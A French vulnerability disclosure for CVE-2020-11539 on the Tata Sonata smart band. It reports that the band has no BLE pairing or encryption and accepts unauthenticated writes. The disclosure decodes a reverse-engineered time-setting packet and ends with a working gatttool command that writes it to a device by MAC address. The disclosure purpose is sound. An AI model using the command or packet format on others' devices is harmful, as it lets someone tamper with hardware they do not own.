
Contrôle d'accès inadéquat dans le bracelet intelligent Tata Sonata
Description: Il a été identifié que le bracelet intelligent n'a pas d'appairage (niveau de sécurité BLE mode 0). Les données transmises par voie hertzienne ne sont pas chiffrées. De plus, les données envoyées au bracelet intelligent n'ont aucune authentification ni vérification de signature, ce qui permet à un attaquant de contrôler les paramètres de l'appareil.
Versions concernées: Smart SF Rush - 1.12
Chercheur: Sayli Ambure (https://twitter.com/sayli_ambure)
Lien MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539
Le paquet suivant a été rétroconçu et s'avère être destiné à changer l'heure. D'autres paquets peuvent être rétroconçus en extrayant le dump hcisnoop de votre téléphone.
Valeur des données: 00870e00141401060712052b051e
| Hexdump des données: | 00 | 87 | 0e | 00 | 14 | 14 | 01 | 06 | 07 | 12 | 05 | 2b | 05 | 1e |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Décimal des données: | 00 | 135 | 14 | 00 | 20 | 20 | 01 | 06 | 07 | 18 | 05 | 43 | 05 | 30 |
00 87: En-tête du paquet
0e 00: Type du paquet
14 14: Année en hexadécimal (2020)
01 06: Mois et jour ( 6 janvier )
07 12: Heure et minute en hexadécimal ( 07:18 )
05 : Secondes
gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e